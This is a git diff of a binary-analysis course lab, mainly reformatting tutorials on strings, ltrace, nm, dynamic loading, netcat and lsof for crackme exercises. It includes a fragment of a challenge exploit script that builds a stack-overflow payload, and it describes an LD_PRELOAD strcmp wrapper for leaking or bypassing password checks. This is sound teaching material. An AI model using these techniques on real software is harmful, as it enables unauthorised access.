What functions does it invoke? What should it invoke? +What actions does the program do? +What functions does it invoke? +What should it invoke? Follow the actions from the entry point in the ELF file and see what is the spot where the program doesn't do what it should. @@ -1032,31 +1032,31 @@ You are given a binary that was stored on a USB stick in space where it was hit Fortunately, because the executable is so small, the only area damaged is the ELF header. Fix it and run it! -The structure of an ELF file is briefly presented here: http://i.imgur.com/m6kL4Lv.png +The structure of an ELF file is briefly presented [here](http://i.imgur.com/m6kL4Lv.png) -A more detailed explaination of the ELF header is presented here: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#Program_header +A more detailed explanation of the ELF header is presented [here](https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#Program_header) The entry point address should be `0x8048054`. -Review this tutorial on creating a minimal ELF file: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html +Review [this tutorial](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) on creating a minimal ELF file. ### Further Pwning -http://crackmes.cf/users/geyslan/crackme.02.32/ is a challenge that will test your knowledge from the first three sessions. +[This](http://crackmes.cf/users/geyslan/crackme.02.32/) is a challenge that will test your knowledge from the first three sessions. The password for the archive is `crackmes.de`. 
### Further Reading -* [ELF-32](http://www.skyfree.org/linux/references/ELF_Format.pdf) -* [ELF-64](http://ftp.openwatcom.org/devel/docs/elf-64-gen.pdf) specification -* [list](https://elinux.org/Executable_and_Linkable_Format_(ELF)) of all ELF specification formats -* [ARM](https://developer.arm.com/documentation/ihi0044/e/) specification -* [Position Independent Code](https://wiki.gentoo.org/wiki/Hardened/Introduction_to_Position_Independent_Code) -* [Creating shared objects](https://www.ibm.com/developerworks/library/l-shobj/) -* [GNU_RELRO](https://www.airs.com/blog/archives/189) -* [GNU_STACK](https://guru.multimedia.cx/pt_gnu_stack/) -* [ELF Special Sections](https://refspecs.linuxfoundation.org/LSB_3.0.0/LSB-Core-generic/LSB-Core-generic/specialsections.html) -* [A Whirlwind Tutorial on Creating Really Teensy ELF Executables for Linux](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) -* [strip manpage](https://sourceware.org/binutils/docs/binutils/strip.html) -* [Some Assembly Required](http://www.mindfruit.co.uk/2012/06/relocations-relocations.html) -* [Study Of ELF Loading and Relocs](http://netwinder.osuosl.org/users/p/patb/public_html/elf_relocs.html) +- [ELF-32](http://www.skyfree.org/linux/references/ELF_Format.pdf) +- [ELF-64](http://ftp.openwatcom.org/devel/docs/elf-64-gen.pdf) specification +- [list](https://elinux.org/Executable_and_Linkable_Format_(ELF)) of all ELF specification formats +- [ARM](https://developer.arm.com/documentation/ihi0044/e/) specification +- [Position Independent Code](https://wiki.gentoo.org/wiki/Hardened/Introduction_to_Position_Independent_Code) +- [Creating shared objects](https://www.ibm.com/developerworks/library/l-shobj/) +- [GNU_RELRO](https://www.airs.com/blog/archives/189) +- [GNU_STACK](https://guru.multimedia.cx/pt_gnu_stack/) +- [ELF Special Sections](https://refspecs.linuxfoundation.org/LSB_3.0.0/LSB-Core-generic/LSB-Core-generic/specialsections.html) +- [A Whirlwind Tutorial on Creating Really 
Teensy ELF Executables for Linux](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) +- [strip manpage](https://sourceware.org/binutils/docs/binutils/strip.html) +- [Some Assembly Required](http://www.mindfruit.co.uk/2012/06/relocations-relocations.html) +- [Study Of ELF Loading and Relocs](http://netwinder.osuosl.org/users/p/patb/public_html/elf_relocs.html) diff --git a/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/client.py b/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/client.py index 870f777..fd8d35b 100755 --- a/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/client.py +++ b/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/client.py @@ -4,7 +4,7 @@ PORT = 9999 MESSAGE = "anaaremere" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -s.connect(('127.0.0.1', PORT)) +s.connect(("127.0.0.1", PORT)) request = MESSAGE print(f"sending '{request}'") diff --git a/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/server.py b/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/server.py index 1acdaf6..022248e 100755 --- a/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/server.py +++ b/chapters/binary-analysis/exploration-tools/demos/05-tutorial-network-netstat-netcat/src/server.py @@ -4,14 +4,14 @@ PORT = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) -s.bind(('', PORT)) +s.bind(("", PORT)) s.listen(1) conn, addr = s.accept() while True: request = conn.recv(1024) if not request: - break + break reply = request.upper() conn.sendall(reply) diff --git a/chapters/binary-analysis/exploration-tools/drills/11-challenge-detective/sol/exploit.py 
b/chapters/binary-analysis/exploration-tools/drills/11-challenge-detective/sol/exploit.py index e222e8e..a6c0713 100755 --- a/chapters/binary-analysis/exploration-tools/drills/11-challenge-detective/sol/exploit.py +++ b/chapters/binary-analysis/exploration-tools/drills/11-challenge-detective/sol/exploit.py @@ -17,7 +17,7 @@ offset = 0x40 + 8 - 11 # Address of function `nononono`. Use `nm ./detective` to get it. -addr = 0x00000000004006d7 +addr = 0x00000000004006D7 payload += offset * b"A" + p64(addr) diff --git a/chapters/binary-analysis/exploration-tools/reading/README.md b/chapters/binary-analysis/exploration-tools/reading/README.md index 496bf84..69122e7 100644 --- a/chapters/binary-analysis/exploration-tools/reading/README.md +++ b/chapters/binary-analysis/exploration-tools/reading/README.md @@ -1,44 +1,23 @@ ---- -linkTitle: Exploration Tools -type: docs -weight: 10 ---- - # Exploration Tools -
- Table of contents - - * [Tutorials](#tutorials) - * [01. Tutorial - Poor man's technique: strings](#01-tutorial---poor-mans-technique-strings) - * [02. Tutorial - Execution tracing (ltrace and strace)](#02-tutorial---execution-tracing-ltrace-and-strace) - * [03. Tutorial - Symbols: nm](#03-tutorial---symbols-nm) - * [04. Tutorial - Library dependencies](#04-tutorial---library-dependencies) - * [05. Tutorial - Network: netstat and netcat](#05-tutorial---network-netstat-and-netcat) - * [06. Tutorial - Open files](#06-tutorial---open-files) - * [Challenges](#challenges) - * [07. Challenge - Perfect Answer](#07-challenge---perfect-answer) - * [08. Challenge - Lots of strings](#08-challenge---lots-of-strings) - * [09. Challenge - Sleepy cats](#09-challenge---sleepy-cats) - * [10. Challenge - Hidden](#10-challenge---hidden) - * [11. Challenge - Detective](#11-challenge---detective) - * [Extra](#extra) - * [Further pwning](#further-pwning) - * [Further Reading](#further-reading) - -
- ## Tutorials + When faced with a binary with no source or parts of the source missing you can infer some of its functionalities based upon some basic reconnaissance techniques using various tools. -### 01. Tutorial - Poor man's technique: strings -The simplest recon technique is to dump the ASCII (or Unicode) text from a binary. It doesn't offer any guarantees but sometimes you can get a lot of useful information out of it. ->By default, when applied to a binary it only scans the data section. To obtain information such as the compiler version used in producing the binary use: -``` +### 01. Tutorial - Poor Man's Technique: strings + +The simplest recon technique is to dump the ASCII (or Unicode) text from a binary. +It doesn't offer any guarantees but sometimes you can get a lot of useful information out of it. + +By default, when applied to a binary it only scans the data section. +To obtain information such as the compiler version used in producing the binary use: + +```text strings -a crackme1 ``` -Let's illustrate how strings can be useful in a simple context. Try out the [crackme1](./activities/01-tutorial-strings/src) binary: +Let's illustrate how strings can be useful in a simple context. +Try out the [crackme1](./activities/01-tutorial-strings/src) binary: ```c #include @@ -76,30 +55,41 @@ int main() } ``` -The password has been redacted from the listing but you can retrieve it with `strings`. Try it out! +The password has been redacted from the listing but you can retrieve it with `strings`. +Try it out! -### 02. Tutorial - Execution tracing (ltrace and strace) +### 02. Tutorial - Execution Tracing (ltrace and strace) -[ltrace](https://man7.org/linux/man-pages/man1/ltrace.1.html) is an utility that can list library function calls or [syscalls](https://man7.org/linux/man-pages/man2/syscalls.2.html) made by a program. [strace](https://man7.org/linux/man-pages/man1/strace.1.html) is similar, but only lists syscalls. 
A syscall is a service exposed by the kernel itself. +[ltrace](https://man7.org/linux/man-pages/man1/ltrace.1.html) is a utility that can list library function calls or [syscalls](https://man7.org/linux/man-pages/man2/syscalls.2.html) made by a program. +[strace](https://man7.org/linux/man-pages/man1/strace.1.html) is similar, but only lists syscalls. +A syscall is a service exposed by the kernel itself. -The way they work is with the aid of a special syscall, called [ptrace](https://man7.org/linux/man-pages/man2/ptrace.2.html). This single syscall forms the basis for most of the functionality provided by `ltrace`, `strace`, `gdb` and similar tools that debug programs. It can receive up to 4 arguments: the operation, the PID to act on, the address to read/write and the data to write. The functionality exposed by `ptrace()` is massive, but think of any functionality you've seen in a debugger: +The way they work is with the aid of a special syscall, called [ptrace](https://man7.org/linux/man-pages/man2/ptrace.2.html). +This single syscall forms the basis for most of the functionality provided by `ltrace`, `strace`, `gdb` and similar tools that debug programs. +It can receive up to 4 arguments: the operation, the PID to act on, the address to read/write and the data to write. +The functionality exposed by `ptrace()` is massive, but think of any functionality you've seen in a debugger: -* attach/detach to/from a process -* set breakpoints -* continue a stopped program -* read/write registers -* act on signals -* register syscalls +- attach/detach to/from a process +- set breakpoints +- continue a stopped program +- read/write registers +- act on signals +- register syscalls -`strace` provides some pretty printing strictly concerning the syscalls of the traced process. However, `ltrace` provides further functionality and gathers information about all library calls. 
Here's how `ltrace` does its magic: +`strace` provides some pretty printing strictly concerning the syscalls of the traced process. +However, `ltrace` provides further functionality and gathers information about all library calls. +Here's how `ltrace` does its magic: -* it reads the tracee memory and parses it in order to find out about loaded symbols -* it makes a copy of the binary code pertaining to a symbol using a `PTRACE_PEEKTEXT` directive of `ptrace()` -* it injects a breakpoint using a `PTRACE_POKETEXT` directive of `ptrace()` -* it listens for a `SIGTRAP` which will be generated when the breakpoint is hit -* when the breakpoint is hit, ltrace can examine the stack of the tracee and print information such as function name, parameters, return codes, etc. +- it reads the tracee memory and parses it in order to find out about loaded symbols +- it makes a copy of the binary code pertaining to a symbol using a `PTRACE_PEEKTEXT` directive of `ptrace()` +- it injects a breakpoint using a `PTRACE_POKETEXT` directive of `ptrace()` +- it listens for a `SIGTRAP` which will be generated when the breakpoint is hit +- when the breakpoint is hit, ltrace can examine the stack of the tracee and print information such as function name, parameters, return codes, etc. -Let's try the next `crackme`. If we remove `my_strcmp` from the previous crackme you can solve it even without `strings` because `strcmp` is called from `libc.so`. You can use `ltrace` and see what functions are used and check for their given parameters. Try it out on the second `crackme` where `strings` does not help ([crackme2](./activities/02-tutorial-execution-tracing/src)): +Let's try the next `crackme`. +If we remove `my_strcmp` from the previous crackme you can solve it even without `strings` because `strcmp` is called from `libc.so`. +You can use `ltrace` and see what functions are used and check for their given parameters. 
+Try it out on the second `crackme` where `strings` does not help ([crackme2](./activities/02-tutorial-execution-tracing/src)): ```c #include @@ -133,10 +123,15 @@ int main() ### 03. Tutorial - Symbols: nm -Symbols are basically tags/labels, either for functions or for variables. If you enable debugging symbols you will get information on all the variables defined but normally symbols are only defined for functions and global variables. When stripping binaries even these can be deleted without any effect on the binary behavior. Dynamic symbols, however, have to remain so that the linker knows what functions to import: -``` +Symbols are basically tags/labels, either for functions or for variables. +If you enable debugging symbols you will get information on all the variables defined but normally symbols are only defined for functions and global variables. +When stripping binaries even these can be deleted without any effect on the binary behavior. +Dynamic symbols, however, have to remain so that the linker knows what functions to import: + +```console $ file xy xy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.16, not stripped + $ nm xy 0804a020 B __bss_start 0804a018 D __data_start @@ -173,7 +168,9 @@ $ nm -D xy U __libc_start_main U puts ``` -Let's take a look at another crackme that combines crackme1 and crackme2. What would you do if you couldn't use neither strings nor ltrace to get anything useful? + +Let's take a look at another crackme that combines crackme1 and crackme2. +What would you do if you couldn't use neither strings nor ltrace to get anything useful? ```c #include @@ -200,7 +197,6 @@ char *deobf(char *s) ??????????????????????????? } - int main() { char buf[1000]; @@ -219,9 +215,11 @@ int main() return 0; } ``` -In [crackme3](./activities/03-tutorial-symbols/src), deobfuscation is done before the password is read. 
Since the `correct_pass` has an associated symbol that is stored at a known location you can obtain the address and peer into it at runtime: -``` +In [crackme3](./activities/03-tutorial-symbols/src), deobfuscation is done before the password is read. +Since the `correct_pass` has an associated symbol that is stored at a known location you can obtain the address and peer into it at runtime: + +```console $ nm crackme3 | grep pass 0804a02c D correct_pass $ gdb -n ./crackme3 @@ -235,11 +233,14 @@ Program received signal SIGINT, Interrupt. 0x804a02c : "JWxb7gE2pjiY3gRG8U" ``` -The above `x/s 0x0804a02c` command in GDB is used for printing the string starting from address `0x0804a02c`. `x` stands for examine memory and `s` stands for string format. In short it dumps memory in string format starting from the address passed as argument. You may print multiple strings by prefixing `s` with a number, for example `x/20s 0x0804a02c`. +The above `x/s 0x0804a02c` command in GDB is used for printing the string starting from address `0x0804a02c`. +`x` stands for examine memory and `s` stands for string format. +In short it dumps memory in string format starting from the address passed as argument. +You may print multiple strings by prefixing `s` with a number, for example `x/20s 0x0804a02c`. For other programs (that are not stripped) you can even get a hint as to what they do using solely `nm`: -``` +```console $ nm mystery_binary ..... 0000000000402bef T drop_privs(char const*) @@ -256,19 +257,27 @@ $ nm mystery_binary 0000000000402255 T urldecode(std::string const&) ..... ``` + **Note:** In this case the signatures are also decoded because the binary was compiled from C++ source code. -Dealing with stripped binaries (or worse, statically linked binaries that have been stripped) is harder but can still be done. We'll see how in a future lab. +Dealing with stripped binaries (or worse, statically linked binaries that have been stripped) is harder but can still be done. 
+We'll see how in a future lab. -### 04. Tutorial - Library dependencies +### 04. Tutorial - Library Dependencies -Most programs you will see make use of existing functionality. You don't want to always reimplement string functions or file functions. Therefore, most programs use dynamic libraries. These shared objects, as they are called alternatively, allow you to have a smaller program and also allow multiple programs to use a single copy of the code within the library. But how does that actually work? +Most programs you will see make use of existing functionality. +You don't want to always reimplement string functions or file functions. +Therefore, most programs use dynamic libraries. +These shared objects, as they are called alternatively, allow you to have a smaller program and also allow multiple programs to use a single copy of the code within the library. +But how does that actually work? -What makes all of these programs work is the Linux dynamic linker/loader. This is a statically linked helper program that resolves symbol names from shared objects at runtime. We can use the dynamic linker to gather information about an executable. +What makes all of these programs work is the Linux dynamic linker/loader. +This is a statically linked helper program that resolves symbol names from shared objects at runtime. +We can use the dynamic linker to gather information about an executable. The first and most common thing to do is see what libraries the executable loads, with the [ldd](https://man7.org/linux/man-pages/man1/ldd.1.html) utility: -``` +```console $ ldd /bin/ls linux-vdso.so.1 (0x00007ffff13fe000) librt.so.1 => /lib64/librt.so.1 (0x00007fc9b4893000) @@ -278,9 +287,11 @@ $ ldd /bin/ls libattr.so.1 => /lib64/libattr.so.1 (0x00007fc9b3eb8000) /lib64/ld-linux-x86-64.so.2 (0x00007fc9b4a9b000) ``` -We see that for each dependency in the executable, `ldd` lists where it is found on the filesystem and where it is loaded in the process memory space. 
Alternatively, you can achieve the same result with the `LD_TRACE_LOADED_OBJECTS` environment variable, or with the dynamic loader itself: -``` +We see that for each dependency in the executable, `ldd` lists where it is found on the filesystem and where it is loaded in the process memory space. +Alternatively, you can achieve the same result with the `LD_TRACE_LOADED_OBJECTS` environment variable, or with the dynamic loader itself: + +```console $ LD_TRACE_LOADED_OBJECTS=whatever /bin/ls linux-vdso.so.1 (0x00007fff325fe000) librt.so.1 => /lib64/librt.so.1 (0x00007f1845386000) @@ -298,27 +309,34 @@ $ /lib/ld-linux-x86-64.so.2 --list /bin/ls libpthread.so.0 => /lib64/libpthread.so.0 (0x00007f18a0001000) /lib64/ld-linux-x86-64.so.2 => /lib/ld-linux-x86-64.so.2 (0x00007f18a0c44000) ``` ->When using the loader directly, make sure the loader and the executable are compiled for the same platform (e.g. they are both 64-bit or 32-bit). ->You may find out more information about dynamic linker/loader variables in its man page. Issue the command -``` +When using the loader directly, make sure the loader and the executable are compiled for the same platform (e.g. they are both 64-bit or 32-bit). +You may find out more information about dynamic linker/loader variables in its man page. +Issue the command: + +```console man ld-linux.so ``` ->and search for the LD_ string to find variables information. -`ldd` shows us **which** libraries are loaded, but it's not any clearer how the loader knows **where** to load them from. First of all, the loader checks every dependency for a slash character. If it finds such a dependency it loads the library from that path, whether it is a relative of absolute path. But it is not the case in our example. For dependencies without slashes, the search order is as follows: +and search for the `LD_` string to find variables information. 
+ +`ldd` shows us **which** libraries are loaded, but it's not any clearer how the loader knows **where** to load them from. +First of all, the loader checks every dependency for a slash character. +If it finds such a dependency it loads the library from that path, whether it is a relative or absolute path. +But it is not the case in our example. +For dependencies without slashes, the search order is as follows: -* `DT_RPATH` attribute in the `.dynamic` section of the executable, provided there is no `DT_RUNPATH`; this is deprecated -* `LD_LIBRARY_PATH` environment variable, which is similar to PATH; does not work with SUID/SGID programs -* `DT_RUNPATH` attribute in the .dynamic section of the executable -* `/etc/ld.so.cache`, generated by [ldconfig](https://man7.org/linux/man-pages/man8/ldconfig.8.html) -* `/lib` and then `/usr/lib` +- `DT_RPATH` attribute in the `.dynamic` section of the executable, provided there is no `DT_RUNPATH`; this is deprecated +- `LD_LIBRARY_PATH` environment variable, which is similar to `PATH`; does not work with `setuid` / `setgid` programs +- `DT_RUNPATH` attribute in the `.dynamic` section of the executable +- `/etc/ld.so.cache`, generated by [ldconfig](https://man7.org/linux/man-pages/man8/ldconfig.8.html) +- `/lib` and then `/usr/lib` The last two options are skipped if the program was linked with the `-z nodeflib` option. Now let's see exactly where the loader finds the libraries: -``` +```console $ LD_DEBUG=libs /bin/ls 11451: find library=librt.so.1 [0]; searching 11451: search cache=/etc/ld.so.cache @@ -340,13 +358,20 @@ $ LD_DEBUG=libs /bin/ls 11451: search cache=/etc/ld.so.cache 11451: trying file=/lib64/libattr.so.1 ``` -The `LD_DEBUG` environment variable makes the dynamic loader be verbose about what it's doing. Try `LD_DEBUG=help` if you're curious about what else you can find out. We can see in the output listed above that all the libraries are found via the loader cache. 
The number at the beginning of each line is ls's PID. -And now we can discuss **how** the loader resolves symbols after it has found the libraries containing them. While variables are resolved when the library is opened, that is not the case for function references. When dealing with functions, the Linux dynamic loader uses something called lazy binding, which means that a function symbol in the library is not resolved until the very first call to it. Think about why this difference exists. +The `LD_DEBUG` environment variable makes the dynamic loader be verbose about what it's doing. +Try `LD_DEBUG=help` if you're curious about what else you can find out. +We can see in the output listed above that all the libraries are found via the loader cache. +The number at the beginning of each line is ls's PID. + +And now we can discuss **how** the loader resolves symbols after it has found the libraries containing them. +While variables are resolved when the library is opened, that is not the case for function references. +When dealing with functions, the Linux dynamic loader uses something called lazy binding, which means that a function symbol in the library is not resolved until the very first call to it. +Think about why this difference exists. You can see the way lazy binding behaves: -``` +```console $ LD_DEBUG=symbols,bindings ./crackme2 ... 11480: initialize program: ./crackme2 @@ -374,37 +399,50 @@ Nope! 11480: ``` -As you can see, functions like `puts()`, `fgets()`, `strlen()` and `strcmp()` are not actually resolved until the first call to them is made. Make the loader resolve all the symbols at startup. (Hint: [ld-linux](https://man7.org/linux/man-pages/man8/ld-linux.8.html)). +As you can see, functions like `puts()`, `fgets()`, `strlen()` and `strcmp()` are not actually resolved until the first call to them is made. +Make the loader resolve all the symbols at startup. +(Hint: [ld-linux](https://man7.org/linux/man-pages/man8/ld-linux.8.html)). 
-**Library Wrapper Task** +#### Library Wrapper Task -You've previously solved `crackme2` with the help of the `ltrace`. Check out the files from [04-tutorial-library-dependencies](./activities/04-tutorial-library-dependencies/src). The folder consists of a `Makefile` and a C source code file reimplementing the `strcmp()` function (library wrapper). The `strcmp.c` implementation uses `LD_PRELOAD` to wrap the actual `strcmp()` call to our own. +You've previously solved `crackme2` with the help of the `ltrace`. +Check out the files from [04-tutorial-library-dependencies](./activities/04-tutorial-library-dependencies/src). +The folder consists of a `Makefile` and a C source code file reimplementing the `strcmp()` function (library wrapper). +The `strcmp.c` implementation uses `LD_PRELOAD` to wrap the actual `strcmp()` call to our own. -In order to see how that works, we need to create a shared library and pass it as an argument to `LD_PRELOAD`. The `Makefile` already takes care of this. To build and run the entire thing, simply run: +In order to see how that works, we need to create a shared library and pass it as an argument to `LD_PRELOAD`. +The `Makefile` already takes care of this. +To build and run the entire thing, simply run: -``` +```console make run ``` This will build the shared library file (`strcmp.so`) and run the `crackme2` executable under `LD_PRELOAD`. -Our goal is to use the `strcmp()` wrapper to alter the program behavior. We have two ways to make the `crackme2` program behave our way: +Our goal is to use the `strcmp()` wrapper to alter the program behavior. +We have two ways to make the `crackme2` program behave our way: 1. Leak the password in the `strcmp()` wrapper. 1. Pass the check regardless of what password we provide. -Modify the `strcmp()` function in the `strcmp.c` source code file to alter the the `crackme2` program behavior in each of the two ways shown above. 
To test it, use the `Makefile`: +Modify the `strcmp()` function in the `strcmp.c` source code file to alter the `crackme2` program behavior in each of the two ways shown above. +To test it, use the `Makefile`: -``` +```console make run ``` ### 05. Tutorial - Network: netstat and netcat -Services running on remote machines offer a gateway to those particular machines. Whether it's improper handling of the data received from clients, or a flaw in the protocol used between server and clients, certain privileges can be obtained if care is not taken. We'll explore some tools and approaches to analyzing remote services. To follow along, use the server and client programs from [05-tutorial-network-netstat-netcat](./activities/05-tutorial-network-netstat-netcat/src). +Services running on remote machines offer a gateway to those particular machines. +Whether it's improper handling of the data received from clients, or a flaw in the protocol used between server and clients, certain privileges can be obtained if care is not taken. +We'll explore some tools and approaches to analyzing remote services. +To follow along, use the server and client programs from [05-tutorial-network-netstat-netcat](./activities/05-tutorial-network-netstat-netcat/src). First of all, start the server: -``` + +```console $ ./server Welcome to the awesome server. Valid commands are: @@ -412,11 +450,12 @@ quit status ``` -Running any of them at this point doesn't offer much help. We'll come back to this later. +Running any of them at this point doesn't offer much help. +We'll come back to this later. The most straightforward way to see what a server does is the [netstat](https://man7.org/linux/man-pages/man8/netstat.8.html) utility. -``` +```console $ netstat -tlpn (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) 
@@ -433,11 +472,16 @@ tcp 0 0 0.0.0.0:44790 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - tcp6 0 0 :::631 :::* LISTEN - ``` -Here we're looking at all the programs that are listening (`-l`) on a TCP port (`-t`). We're also telling netcat not to resolve hosts (`-n`) and to show the process that is listening (`-p`). We can see that our server is listening on port 31337. Let's keep that in mind and see how the client behaves. -``` +Here we're looking at all the programs that are listening (`-l`) on a TCP port (`-t`). +We're also telling `netstat` not to resolve hosts (`-n`) and to show the process that is listening (`-p`). +We can see that our server is listening on port `31337`. +Let's keep that in mind and see how the client behaves: + +```console $ ./client Usage: ./client + $ ./client the_laughing_man localhost 31337 Welcome to the awesome server. Valid commands are: @@ -463,11 +507,15 @@ Not enough minerals! Enter a command (or 'quit' to exit): ``` -So we can do anything except the privileged command `infoclient`. Running `status` on the server yields no information. What can we do now? +So we can do anything except the privileged command `infoclient`. +Running `status` on the server yields no information. +What can we do now? -We can see what the server and client are exchanging at an application level by capturing the traffic with the [tcpdump](https://man7.org/linux/man-pages/man1/tcpdump.1.html) utility. Start tcpdump, the server and then the client, and run the commands again. When you're done, stop tcpdump with Ctrl+C. +We can see what the server and client are exchanging at an application level by capturing the traffic with the [tcpdump](https://man7.org/linux/man-pages/man1/tcpdump.1.html) utility. +Start tcpdump, the server and then the client, and run the commands again. +When you're done, stop tcpdump with Ctrl+C.
-``` +```console # tcpdump -i any -w crackme5.pcap 'port 31337' tcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes ^C21 packets captured @@ -490,9 +538,10 @@ We can use it instead of the "official" client and see what happens when we craf Go ahead! Start the server again and a normal client. ->Connect to the server using `netcat`. Then send out the required string through the `netcat` connection with true as the second parameter and see if you can find out anything about the normal client. +Connect to the server using `netcat`. +Then send out the required string through the `netcat` connection with true as the second parameter and see if you can find out anything about the normal client. -``` +```console # netcat localhost 31337 Welcome to the awesome server. Valid commands are: @@ -502,17 +551,21 @@ infoclient [ADMIN access required] sendmsg ``` -**Doing it in Python** +#### Doing it in Python -You can create a sever and a client in Python only. We can use the `server.py` and `client.py` scripts. Check them out first. +You can create a server and a client in Python only. +We can use the `server.py` and `client.py` scripts. +Check them out first. Then run the server by using: -``` + +```console python server.py ``` + It now accepts connections on TCP port 9999 as you can see by using `netstat`: -``` +```console $ netstat -tlpn [...] Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name @@ -522,32 +575,33 @@ tcp 0 0 127.0.0.1:9999 0.0.0.0:* LISTEN Now you can test it using the Python client: -``` +```console $ python client.py sending 'anaaremere' received 'ANAAREMERE' ``` -We can do the same using netcat as the client: -``` +We can do the same using `netcat` as the client: + +```console $ nc localhost 9999 anaaremere ANAAREMERE ``` -**Doing it Only with netcat** +#### Doing it Only with netcat -We can still simulate a network connection using netcat only, both for starting the server and for runing the client.
+We can still simulate a network connection using `netcat` only, both for starting the server and for running the client. Start the server with: -``` -$ nc -l -p 4444 +```console +nc -l -p 4444 ``` Now run the client and send messages by writing them to standard input: -``` +```console $ nc localhost 4444 aaaaa bbbbb @@ -555,57 +609,64 @@ bbbbb Messages you write to the client and up in the server. -This goes both ways: if you write messages on the server they end up in the client. Try that. +This goes both ways: if you write messages on the server they end up in the client. +Try that. -If you want to send a large chunk of data you can redirect a file. Start the server again: +If you want to send a large chunk of data you can redirect a file. +Start the server again: -``` -$ nc -l -p 4444 +```console +nc -l -p 4444 ``` and now send the file to it: +```console +cat /etc/services | nc localhost 4444 ``` -$ cat /etc/services | nc localhost 4444 -``` + It's now on the server side. -You can also do it with UDP, instead of TCP by using the `-u` flag both for the server and the client. Start the server using: +You can also do it with UDP, instead of TCP by using the `-u` flag both for the server and the client. +Start the server using: +```console +nc -u -l -p 4444 ``` -$ nc -u -l -p 4444 -``` + And run the client using: +```console +cat /etc/services | nc -u localhost 4444 ``` -$ cat /etc/services | nc -u localhost 4444 -``` -That's how we use netcat (the network swiss army knife). ->You can also look into [socat](https://linux.die.net/man/1/socat) for a complex tool on dealing with sockets. +That's how we use `netcat` (the network swiss army knife). + +You can also look into [`socat`](https://linux.die.net/man/1/socat) for a complex tool on dealing with sockets. ### 06. Tutorial - Open files Let's remember how files and programs relate in Linux. 
- -![Files](assets/files.png) +![Files](../media/files.png) Let's also remember that, in Linux, `file` can mean one of many things: -* regular file -* directory -* block device -* character device -* named pipe -* symbolic or hard link -* socket +- regular file +- directory +- block device +- character device +- named pipe +- symbolic or hard link +- socket -Let's look at the previous server from `crackme5`. Start it up once again. +Let's look at the previous server from `crackme5`. +Start it up once again. -While previously we've used netstat to gather information about it, that was by no means the only solution. [lsof](https://linux.die.net/man/8/lsof) is a tool that can show us what files a process has opened: +While previously we've used netstat to gather information about it, that was by no means the only solution. +[lsof](https://linux.die.net/man/8/lsof) is a tool that can show us what files a process has opened: -``` +```console $ lsof -c server COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME server 9678 amadan cwd DIR 8,6 4096 1482770 /home/amadan/projects/sss/session01/crackmes/crackme5 @@ -622,19 +683,19 @@ server 9678 amadan 3u IPv4 821076 0t0 TCP *:31337 (LISTEN) We can see the standard file descriptors found in any process, as well as our socket. - * The `FD` column shows the file descriptor entry for a file, or a role in case of special files. We notice the current working directory (`cwd`), the root directory (`rtd`), the current executable (`txt`), some memory mapped files (`mem`) and the file descriptors (0-3). For normal file descriptors, `r` means read access, `w` means write access and `u` means both. - - * The `TYPE` column shows whether we're dealing with a directory (`DIR`), a regular file (`REG`), a character device (`CHR`), a socket (`IPv4`) or other type of file. - - * The `NODE` column shows the inode of the file, or a class marker as is the case for the socket. 
+- The `FD` column shows the file descriptor entry for a file, or a role in case of special files. + We notice the current working directory (`cwd`), the root directory (`rtd`), the current executable (`txt`), some memory mapped files (`mem`) and the file descriptors (0-3). + For normal file descriptors, `r` means read access, `w` means write access and `u` means both. +- The `TYPE` column shows whether we're dealing with a directory (`DIR`), a regular file (`REG`), a character device (`CHR`), a socket (`IPv4`) or other type of file. +- The `NODE` column shows the inode of the file, or a class marker as is the case for the socket. +- The `NAME` column shows the path to the file, or the bound address and port for a socket. - * The `NAME` column shows the path to the file, or the bound address and port for a socket. - -We've left out some details since they are not relevant for our purposes. Feel free to read the manual page. +We've left out some details since they are not relevant for our purposes. +Feel free to read the manual page. You could also get some hint that there is an open socket by looking into the `/proc` virtual filesystem: -``` +```console $ ls -l /proc/`pidof server`/fd total 0 lrwx------ 1 amadan amadan 64 Jun 15 22:04 0 -> /dev/pts/2 @@ -644,16 +705,17 @@ lrwx------ 1 amadan amadan 64 Jun 15 22:04 3 -> socket:[883625] ``` We'll be using [crackme6](./activities/06-tutorial-open-files/src) for the next part of this section. -Try the conventional means of `strings` and `ltrace` on it. Then run it normally. +Try the conventional means of `strings` and `ltrace` on it. 
